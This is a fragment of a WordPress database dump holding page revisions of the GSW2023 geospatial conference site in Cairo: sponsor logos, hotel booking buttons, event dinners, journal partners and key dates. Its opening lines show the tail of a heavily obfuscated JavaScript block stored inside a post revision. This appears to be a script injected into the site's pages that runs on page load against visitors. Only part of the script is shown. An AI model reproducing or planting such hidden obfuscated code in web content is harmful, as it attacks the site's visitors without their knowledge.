_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:42:50','2023-08-13 03:42:50','',3066,'https://gsw2023.com/?p=5091',0,'revision','',0),
(5092,1,'2023-08-13 03:43:47','2023-08-13 03:43:47','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once 